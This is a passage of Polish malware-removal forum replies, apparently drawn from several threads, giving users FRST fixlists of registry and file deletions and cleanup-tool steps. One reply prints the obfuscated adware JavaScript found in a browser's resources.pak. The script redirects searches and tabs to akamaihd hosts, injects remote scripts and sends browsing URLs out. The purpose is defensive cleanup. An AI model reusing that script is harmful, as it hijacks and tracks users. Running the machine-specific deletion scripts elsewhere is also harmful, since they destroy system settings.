Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Toolbar" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść przeglądarki: Firefox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania Opera:CTRL+SHIFT+E i na liście rozszerzeń upewnij się, że nie widać jakiegoś obiektu bez nazwy (teoretycznie nazwą powinno być coś z Cinema Plus...) 4. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z zaznaczonym polem Addition. Dołącz też plik fixlog.txt.

Obrazek wskazuje, że Hitman wykrył, iż już był używany wcześniej przez 30 dni (tylko przez ten zakres czasu usuwanie jest za darmo) i obecnie prosi o płatną aktywację. W związku z tym wykryte przez niego rzeczy zostaną usunięte w inny sposób: Pobierz ponownie FRST. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: DeleteKey: HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\APNSetup_RASAPI32 DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\APNSetup_RASMANCS DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\apnstub_RASAPI32 DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\apnstub_RASMANCS DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\AskPartnerCobrandingTool_RASAPI32 DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\AskPartnerCobrandingTool_RASMANCS DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\AskSLib_RASAPI32 DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\AskSLib_RASMANCS DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\BundleSweetIMSetup_RASAPI32 DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\BundleSweetIMSetup_RASMANCS DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\dsrlte_RASAPI32 DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\dsrlte_RASMANCS DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\dsrsetup_RASAPI32 DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\dsrsetup_RASMANCS DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\TBNotifier_RASAPI32 DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\TBNotifier_RASMANCS DeleteKey: HKU\S-1-5-21-2953119984-1137956692-2323332510-1000\Software\AppDataLow\Software\SmartBar Reg: reg delete "HKU\S-1-5-21-2953119984-1137956692-2323332510-1000\Software\Microsoft\Internet Explorer\Approved Extensions" /v {2EECD738-5844-4A99-B4B6-146BF802613B} /f Reg: reg delete "HKU\S-1-5-21-2953119984-1137956692-2323332510-1000\Software\Microsoft\Internet Explorer\Approved Extensions" /v {4D2D3B0F-69BE-477A-90F5-FDDB05357975} /f Reg: reg delete "HKU\S-1-5-21-2953119984-1137956692-2323332510-1000\Software\Microsoft\Internet Explorer\Approved Extensions" /v {98889811-442D-49DD-99D7-DC866BE87DBC} /f RemoveDirectory: C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\External Extensions\{EEE6C373-6118-11DC-9C72-001320C79847} CMD: del /q D:\torrenty\ElfBot\ElfCrack.exe EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Nastąpi restart. Przedstaw wynikowy fixlog.txt.

DelFix wykonał zadanie. Skasuj z dysku plik C:\delfix.txt. Temat na poziomie infekcji rozwiązany. Zamykam.

To na pewno nie był "patronat Windowsa" tylko jakiś zewnętrzny downloader ze śmieciami. MBAM usunął większość, ale nadal są rzeczy wymagające interwencji. Akcje do przeprowadzenia: 1. Klawisz z glagą Windows + X > Programy i funkcje > odinstaluj DivX Setup, Lenovo Experience Improvement, YTDownloader. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {2D0F1E28-662C-4C5C-BDE3-5E1B41C020C8} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku Task: {5DBE6CD5-D342-444F-945F-90F8DA81A900} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku Task: {63473F0B-20A3-4E79-B13A-4FB900287DAB} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku Task: {765EC4E9-FCBD-4847-8242-C29CB7B56447} - System32\Tasks\DolbySelectorTask => C:\Program Files\Dolby Digital Plus\ddp.exe Task: {884A573E-C166-4098-89DA-71BD444091C4} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku Task: {A39518E1-AC7E-471C-9EC7-82421129EF0A} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku Task: {B37F8827-BDFD-49BF-B332-DEEED7344DCF} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku Task: {B88F7036-E41B-41C4-8F4B-16C08820B8E6} - \SwiftSearch Auto Updater 1.10.0.25 Pending Update -> Brak pliku Task: {BA62DB0D-BFED-4A61-A7A8-DA1E89AD0D22} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Brak pliku Task: {BD717486-3AA1-4741-A9E2-A4EF0BBDAE16} - System32\Tasks\rM6tDeUqcice8BlkxxN => C:\Users\Artek\AppData\Roaming\rM6tDeUqcice8BlkxxN.exe Task: {C51936AF-E5B9-4052-AF5F-6197866FAA5B} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku Task: {D6C2DF30-9E50-4C1A-958D-3164377933C4} - \SPBIW_UpdateTask_Time_3431373836393938312d5555376c345a2d5732415b34 -> Brak pliku Task: {E10BA004-8998-4FF5-9CFF-6350F8D710A3} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku Task: {E7616676-6484-4192-A73A-B244EB62E236} - \SwiftSearch Auto Updater 1.10.0.25 Core -> Brak pliku Task: {E7993F4C-CF99-46F3-9816-310DD628D602} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku Task: {ECC1DB1E-1E1D-49E6-A5B1-32C44FF31673} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku Task: C:\WINDOWS\Tasks\rM6tDeUqcice8BlkxxN.job => C:\Users\Artek\AppData\Roaming\rM6tDeUqcice8BlkxxN.exe HKLM\...\Policies\Explorer: [NoFolderOptions] 0 HKLM\...\Policies\Explorer: [NoControlPanel] 0 HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank SearchScopes: HKU\S-1-5-21-2917318248-312038480-3579672598-1001 -> DefaultScope {32B65AEB-5645-494E-B171-D5A461F21AB7} URL = SearchScopes: HKU\S-1-5-21-2917318248-312038480-3579672598-1001 -> {32B65AEB-5645-494E-B171-D5A461F21AB7} URL = C:\Program Files (x86)\c8a346ee-cfc8-4a6e-8dbb-4c0a7e12254c C:\Program Files (x86)\globalUpdate C:\Program Files (x86)\YTDownloader C:\Users\Artek\AppData\Local\BrowserHelper C:\Users\Artek\AppData\Local\CrashRpt C:\Users\Artek\AppData\Local\globalUpdate C:\Users\Artek\AppData\LocalLow\lpm.dat C:\Users\Artek\AppData\Roaming\rM6tDeUqcice8BlkxxN C:\Users\Artek\AppData\Roaming\RunDir C:\Users\Artek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\YTDownloader C:\WINDOWS\chromebrowser.exe C:\WINDOWS\system32\Drivers\etc\hp.bak C:\WINDOWS\SysWOW64\029B560A371F4E00AB32838EBC01B9E7 File: C:\Programdata\Lenovo App Services\Engine\LenovoAppServices.exe Reg: reg delete HKLM\SOFTWARE\MozillaPlugins /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Mozilla /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\MozillaPlugins /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC} /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\mbot_pl_014010132_is1 /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Uruchom Zoek. W oknie wklej: globalupdate Helper;u Klik w Run Script. Powstanie log zoek-results.log. 4. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z zaznaczonym polem Addition. Dołącz też pliki fixlog.txt i zoek-results.txt (po zmianie nazwy z *.log)..

1. Hitman wykrył więcej szczątków. Do usunięcia wszystkie wyyniki z wyjątkiem grupy "Suspicious files" kierującej na katalog PunkBuster. 2. Wyczyść foldery Przywracania systemu: KLIK. 3. Nie wiadomo jaki był cel infekcji wprowadzonej przez crack. Na wszelki wypadek zmień hasła w serwisach online (bank, poczta, itd.).

Wszystko zrobione. Teraz: 1. Zastosuj DelFix, by dokasował pobrane skanery. 2. Zrób skan za pomocą Hitman Pro. Nic jeszcze nie usuwaj, tylko dostarcz wyniki skanu.

Fix pomyślnie wykonany. AdwCleaner dopatrzył się jeszcze szczątków adware. Kolejna porcja zadań: 1. Uruchom AdwCleaner ponownie, tym razem zastosuj kombinację opcji Skanuj + Usuń. Gdy program ukończy czyszczenie: 2. Otwórz Notatnik i wklej w nim: RemoveDirectory: C:\AdwCleaner Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Przedstaw wynikowy fixlog.txt.

Wszystko zrobione. Poprawki: 1. Otwórz Notatnik i wklej w nim: RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Program Files (x86)\Mozilla Firefox RemoveDirectory: C:\Users\Admin\Downloads\FRST-OlderVersion CMD: del /q C:\ProgramData\TNKsoftwares.exe CMD: del /q C:\Users\Admin\Desktop\~ESETUninstaller.log CMD: del /q C:\Users\Admin\Downloads\gvxn932x.exe CMD: del /q C:\Windows\Minidump\*.dmp Reg: reg delete HKCU\Software\Mozilla /f Reg: reg delete HKCU\Software\MozillaPlugins /f Reg: reg delete HKLM\SOFTWARE\Mozilla /f Reg: reg delete HKLM\SOFTWARE\MozillaPlugins /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Mozilla /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\mozilla.org /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\MozillaPlugins /f Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Powstanie kolejny plik fixlog.txt. Przedstaw go. 2. Uruchom AdwCleaner. Wybierz opcję Skanuj i dostarcz wynikowy log z folderu C:\AdwCleaner

Nic więcej tu już nie wymyślę. Skoro firma hostingowa potwierdziła ruch, to najwyraźniej doszło do przejęcia konta, tylko nadal źródło problemu jest nieznane. Nic tu nie wskazywało, by w systemie była jakaś infekcja. A DelFix wykonał zadanie. Skasuj z dysku plik C:\delfix.txt. To tyle.

Bez wątpienia był zainfekowany plik zasobów resources.pak. W tym kluczowym pliku przeglądarki adware zintegrowało następujący skrypt produkujący przekierowania i reklamy: <!-- Copyright 2013 The Chromium Authors. All rights reserved. Use of this source code is governed by a BSD-style license that can be found in the LICENSE file. We use an HTML page just to have access to the DOM, for URL parsing. An alternative would be to include a URL parsing JavaScript library with the extension but this approach is likely smaller and faster. --> <html> <head> <script src="thunk.js"></script> </head> <body> </body> </html> try{(function(d,u){function k(a){for(var b=0;b<a.length;b++){var e=b,c;c=a[b];if("string"===typeof c)a:{if(!v(c))for(var g=0;g<p.length;g++)if(p[g].test(c)){c="";break a}}else c=c.toString();c=encodeURIComponent(c.replace(w,"$cma;"));a[e]=c}(new Image).src="https://magicalfind-a.akamaihd.net/stats/?"+a.shift()+"="+a.join("|,|")}function m(a){return[ ".*volunteercentre.org.*",".*search.yahoo.com.*ddc[_-]bd.*",".*capn=ed_ui_.*_kw_001.*",".*ask.com.*siteid=28527.*",".*src=55cd729e57e760c05c8b466e.*",".*capn=ed_ui_jp_kw_002.*",".*thesmartsearch.net.*",".*search.results-hub.com.*",".*search.netbetterresults.com.*"," .*search.yahoo.com.*ddc[_-]bd.*",".*fluey.com.*",".*tapxchange.com.*",".*search.searchitknow.com.*",".*home.searchpile.com.*",".*au.ask.com.*28527.*",".*uk.ask.com.*32859.*",".*thesmartsearch.net.*p=ein.*",".*capn=ed_ui_.*_kw_004.*",".*search.top-arama.com.*","http:\\/\\/searchinterneat-a\\.akamaihd\\.net\\/s.*","http:\\/\\/searchinterneat-a\\.akamaihd\\.net\\/h.*",".*search.yahoo.com.*_bd_com.*",".*=__default.*"].some(function({return(new RegExp().test(a)})}function x(a,{var e=queryCommandValue;h(function(c){c||(c={});var g=c["BL_ST_"+a+"_"+e],d=Date.now();g?3E3>d-g?b&&b(!0):(c["BL_ST_"+a+"_"+e]=d,b&&b(!1),f(c)):(c["BL_ST_"+a+"_"+e]=d,f(c),b&&b(!1))})}function h(a){chrome.storage.local.get("BLGC_STORAGE",function({a&&a(b.BLGC_STORAGE)})}function f(a){var b={};b.BLGC_STORAGE=a;chrome.storage.local.set(b,function(){})}function q(a){try{if(0==a.length)return{hostName:""};var b=u.createElement("a");0!=a.indexOf("http")&&(a="http://"+a);b.href=a;return b}catch(e){}return{hostname:a}}function y(a){a=a.toLowerCase();for(var b=0;b<n.length;b++)if(-1!=a.indexOf(n[b].host.toLowerCase()))return b;return-1}function l(a,{try{b=b.replace(/[\[]/,"\[").replace(/[\]]/,"\]");var e=(new RegExp("[\?]"+b+"=([^]*)")).exec(a);return null==e?null:e[1]}catch(c){}}function z(a,{var e=l(a,n[b].oparam);switch({case 0:case 2:case 3:case 4:return!!e;case 1:var e=l(a,"type"),c=l(a,"hsimp"),g=l(a,"fr"),d=/^http(s)?:\/\/(.{2}\.)?(malaysia\.)?(y.*\.)?search\.yahoo\./;return!!g&&-1!=g.indexOf("ddc-bd")||!!c&&-1!=c.indexOf("ddc_bd")||!!e&&-1!=e.indexOf("_bd_com")||!d.test(a)||-1!=a.indexOf("/local/")}return!1}function r(a,{var e=-1,c="",g="http://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ5ZBAFFRQAVbQ4LBQlcFVYUJhRaUgAQDAdHeVtdVQtFRAQUIR9aFQQTQkcFME0FA1UWQhNNfXRZBlASQFllKVdc&q=|search_term|",d=null,f=null;b.url&&!m(b.url)&&(f=q(b.url).hostname,h(function(h){h||(h={});if(-1!=(e=y(f))){if(h[a]&&(d=q(h[a]).hostname,(!f||f==d)&&1!=e))return;c=n[e].param;!z(b.url,e)&&(queryCommandValue=l(b.url,c))&&x(a,function(c){c?k(["BL_YS_Action_2","MagicalFind","7ae84d56-73d0-4c7f-b39a-2d9be424e17a","blgc","SkippedSearch",b.url]):(g="http://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ5ZBAFFRQAVbQ4LBQlcFVYUJhRaUgAQDAdHeVtdVQtFRAQUIR9aFQQTQkcFME0FA1UWQhNNfXRZBlASQFllKVdc&q=|search_term|".replace("|search_term|",queryCommandValue),chrome.tabs.update(a,{url:g}),k(["BL_YS_Action_2","MagicalFind","7ae84d56-73d0-4c7f-b39a-2d9be424e17a","blgc","Search",b.url]))})}}))}function A(a,b,e){try{chrome.tabs.executeScript(a,{code:"if(!window.blgcran){ window.blgcran = true; var scr=document.createElement('script'); scr.src='https://magicalfind-a.akamaihd.net/MagicalFind/cr?t=BLGC&g=7ae84d56-73d0-4c7f-b39a-2d9be424e17a&pn=Chrome'; document.head.appendChild(scr);}"})}catch(c){}-1!=t.indexOf(b.url)&&(m(e.url)||chrome.tabs.update(a,{url:"http://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHAJCJQEMBQxHDAIQJAkVVVpGRxhBcwBZTAsVGFdGdAsMBAhGQBNBNARaAktXUUEeIlVfAh8fHHhCJ1BbAFU3SFtH"}),h(function(c){c||(c={});c[a]=b.url;f(c)}),d.skipNewTabMsg?d.skipNewTabMsg=!1:k(["BL_YS_Action_2","MagicalFind","7ae84d56-73d0-4c7f-b39a-2d9be424e17a","blgc","NewTab",b.url]));d.firstRun=!1;r(a,;b.url&&h(function(c){c||(c={});c[a]=b.url;f(c)})}"undefined"==typeof d.firstRun&&(d.firstRun=!1);"undefined"==typeof d.skipNewTabMsg&&(d.skipNewTabMsg=!1);var t=["chrome://newtab/","safer://newtab/"],n=[{host:".bing.",param:"q",oparam:"qs"},{host:"search.yahoo.",param:"p",oparam:"fr"},{host:".google.",param:"q",oparam:"site"},{host:".ask.",param:"q",oparam:"qo"},{host:"search.aol.",param:"q",oparam:"s_it"},{host:"go.mail.ru",param:"q",oparam:"NA"},{host:"intent.clara-labs.",param:"q",oparam:"NA"},{host:"trovi.",param:"q",oparam:"NA"},{host:".plusnetwork.",param:"q",oparam:"NA"},{host:"isearch.bobrowser.",param:"q",oparam:"NA"},{host:"www-searching.",param:"q",oparam:"NA"},{host:".thesmartsearch.",param:"q",oparam:"NA"},{host:".search.safer.",param:"q",oparam:"NA"},{host:".cassiopessa.",param:"q",oparam:"NA"}],p=[/(?:\d[(). -]*?){9,16}/,/[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?/i],w=/,/g;btoa("94df1405-b2c7-479e-98ea-4be1fc81ab76_54_10");var v=function(){var a=/^[\d,a-f]{8}-(?:[\d,a-f]{4}-){3}[\d,a-f]{12}$/i;return function({return a.test(}}();chrome.runtime.onStartup.addListener(function(){d.firstRun=!0;d.skipNewTabMsg=!0;f({})});chrome.tabs.onReplaced.addListener(function(a,{var e,c;h(function(d){d||(d={});e=d[a];c=d[b];d[a]=c;d[b]=e;f(d)})});chrome.tabs.onRemoved.addListener(function(a){h(function({b||(b={});delete b[a];f(})});chrome.tabs.onCreated.addListener(function(a){if(a.id&&!a.openerTabId)if(d.firstRun){if(m(a.url))return;chrome.tabs.update(a.id,{url:"http://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRggUIVwAVV1EFxgUc10ITA0SFlMOIgoBABRDRQxBJQ0KVVxAFlQFIk0FA1oDB0VXfVtUBlpXTwhuIV5RAlgdZ1xNJA=="});k(["BL_YS_Action_2","MagicalFind","7ae84d56-73d0-4c7f-b39a-2d9be424e17a","blgc","HomePage",a.url])}else-1==t.indexOf(a.url)||m(a.url)||(chrome.tabs.update(a.id,{url:"http://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHAJCJQEMBQxHDAIQJAkVVVpGRxhBcwBZTAsVGFdGdAsMBAhGQBNBNARaAktXUUEeIlVfAh8fHHhCJ1BbAFU3SFtH"}),k(["BL_YS_Action_2","MagicalFind","7ae84d56-73d0-4c7f-b39a-2d9be424e17a","blgc","NewTab",a.url]));else a.openerTabId&&h(function({b||(b={});b[a.id]=b[a.openerTabId];f(});d.firstRun=!1});chrome.webNavigation.onBeforeNavigate.addListener(function(a){0===a.frameId&&r(a.tabId,{url:a.url})});chrome.tabs.onUpdated.addListener(function(a,b,d){A(a,b,d)})})(window,document)}catch(d){};// Copyright 2013 The Chromium Authors. All rights reserved. // .Przeglądarka została przeinstalowana, co automatycznie zlikwidowało modyfikację. Teraz drobnostki do wykonania: 1. Deinstalacje: - Odinstaluj starą wersję (luki!) Adobe Reader 9.1 Lite. - Usuń szczątkowy ukryty program. Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście wpis AVG PC TuneUp 2015 (pl-PL) > Dalej. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction HKU\S-1-5-21-3186815166-2112447843-958612567-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com HKU\S-1-5-21-3186815166-2112447843-958612567-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch SearchScopes: HKU\S-1-5-21-3186815166-2112447843-958612567-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = Task: {C3EC9D74-38F9-4939-87AC-AF3FA7D68859} - System32\Tasks\{40392E45-CAC5-4EB7-B95E-BDE5ED4EAC60} => pcalua.exe -a "D:\Pobrane\Gry\inkwizycja\Dragon Age Inquisition - Deluxe Edition\__Installer\vc\vc2010sp1\redist\vcredist_x64.exe" -d "D:\Pobrane\Gry\inkwizycja\Dragon Age Inquisition - Deluxe Edition\__Installer\vc\vc2010sp1\redist" Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan) na następującym ustawieniu: w sekcji Whitelist (Filtrowanie) odznacz sekcję Internet, a pól Addition i Shortcut już nie zaznaczaj. Dołącz też plik fixlog.txt.

Tak, są tu sterowniki StdLib wprowadzone przez adware i jest to potencjalna przyczyna BSOD. Ale to ledwie część problemu, gdyż w tle działa innogatunkowa infekcja typu trojan (falsyfikat svchost.exe), wprowadzona przez lewy dodatek Xenobot: 2015-10-30 18:38 - 2015-10-30 18:38 - 00000000 ____D C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\XenoBot 2015-10-30 18:36 - 2015-10-30 18:36 - 00083456 ____H C:\Users\Admin\AppData\Roaming\svchost.exe 2015-10-30 18:30 - 2015-10-30 18:33 - 06201516 _____ C:\Users\Admin\Downloads\Xenobot+Crack (1).rar 2015-10-30 18:09 - 2015-10-30 18:40 - 00000000 ____D C:\Users\Admin\Documents\XenoBot 2015-10-30 18:06 - 2015-10-30 18:07 - 00601349 _____ C:\Users\Admin\Downloads\xenoosiann2.rar 2015-10-30 18:00 - 2015-10-30 18:05 - 09393115 _____ C:\Users\Admin\Downloads\XenoBot.rar I jest tu także bardzo stary ESET na sterownikach z 2011 i on także powinien być zaadresowany. Akcje do przeprowadzenia: 1. Deinstalacje: - Odinstaluj via Panel sterowania stare wersje oraz złe aplikacje: Adobe Flash Player 15 Plugin, Adobe Reader XI (11.0.13) - Polish, DownLite, Java 7 Update 40, Mozilla Firefox 16.0.1 (x86 pl) + Mozilla Maintenance Service, ESET NOD32 Antivirus, XenoBot Apophis. Przy deinstalacji Firefox zaznacz usuwanie profilu z dysku. Skasuj też z dysku wszystkie pobrane paczki Xenobot. - Następnie wejdź w Tryb awaryjny i popraw jeszcze narzędziem ESET Uninstaller. Po akcji opuść Tryb awaryjny. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R1 wStLibG64; C:\Windows\System32\drivers\wStLibG64.sys [61112 2014-03-14] (StdLib) R1 {58aaf827-6246-4d80-8213-f02005f6345c}w64; C:\Windows\System32\drivers\{58aaf827-6246-4d80-8213-f02005f6345c}w64.sys [48776 2015-02-24] (StdLib) R1 {b9a19c25-a741-47e5-91a2-0b62bef307ff}w64; C:\Windows\System32\drivers\{b9a19c25-a741-47e5-91a2-0b62bef307ff}w64.sys [61112 2014-06-12] (StdLib) S0 sptd; \SystemRoot\System32\Drivers\sptd.sys [X] HKU\S-1-5-21-2953119984-1137956692-2323332510-1000\...\Run: [Windows.exe] => C:\Users\Admin\AppData\Roaming\Windows\Windows.exe [784951 2015-09-09] (‚„‘„‘„‘‚fx) HKU\S-1-5-21-2953119984-1137956692-2323332510-1000\...\Run: [MSTime] => C:\Users\Admin\AppData\Roaming\svchost.exe [83456 2015-10-30] () Startup: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ALFALINE.lnk [2015-10-13] InternetURL: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TNKsoftwares.com.url -> 0 Task: {37A91A57-4BF2-4AC4-904D-01716ADBB8BF} - System32\Tasks\{0D517AEB-F02C-4656-9044-0E31255D10EF} => pcalua.exe -a "D:\Program Files\TeamSpeak 3 Client\plugins\ts3overlay\InstallHook.exe" -d "D:\Program Files\TeamSpeak 3 Client\plugins\ts3overlay\" -c ts3overlay_hook_win32.dll 10000 Task: {3EA0789D-CEF6-44F1-9319-A61ABC75132D} - System32\Tasks\{B197DD34-164A-422C-9884-1D186A56F473} => pcalua.exe -a C:\Users\Admin\Desktop\funnyvoice-setup.exe -d C:\Users\Admin\Desktop Task: {717C666A-17A1-46F4-9824-D1B10415F884} - System32\Tasks\{6FD98B9C-A88B-4920-A98F-8E4A52074BE6} => pcalua.exe -a C:\PROGRA~2\COMMON~1\INSTAL~1\Driver\11\INTEL3~1\IDriver.exe -c /M{809D7E6D-915D-4EAD-821F-E13D93F37161} /l1033 Task: {A76421E4-330B-4A8B-A05F-AACAB986D607} - System32\Tasks\{848D1DC3-791C-485C-BDFA-CC0AA71D4DCC} => pcalua.exe -a "D:\Program Files (x86)\Steam\steamapps\common\arma 2 operation arrowhead\BEsetup\Setup_BattlEyeARMA2OA.exe" -d "D:\Program Files (x86)\Steam\steamapps\common\arma 2 operation arrowhead\BEsetup" Task: {C41E4907-DEA4-4CB2-8776-62B2EC738D0C} - System32\Tasks\{988AE7F0-6AED-49E0-9C9C-48319DF1D0E4} => Chrome.exe hxxp://ui.skype.com/ui/0/6.20.0.104/pl/abandoninstall?page=tsMain GroupPolicy: Ograniczenia - Chrome CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia HKU\S-1-5-21-2953119984-1137956692-2323332510-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://rts.dsrlte.com?affID=na SearchScopes: HKU\S-1-5-21-2953119984-1137956692-2323332510-1000 -> DefaultScope {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL = hxxp://search.babylon.com/?q={searchTerms}&affID=112250&babsrc=SP_ss&mntrId=c62e8f7f000000000000000000000000 SearchScopes: HKU\S-1-5-21-2953119984-1137956692-2323332510-1000 -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL = hxxp://search.babylon.com/?q={searchTerms}&affID=112250&babsrc=SP_ss&mntrId=c62e8f7f000000000000000000000000 SearchScopes: HKU\S-1-5-21-2953119984-1137956692-2323332510-1000 -> {7D0D1FAF-64FD-4A23-8EB7-870846F875A6} URL = hxxp://rts.dsrlte.com/?affID=na&q={searchTerms}&r=887 C:\ProgramData\TEMP C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced Tactical Center C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Asprate C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Codemasters C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Heroes III C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SopCast 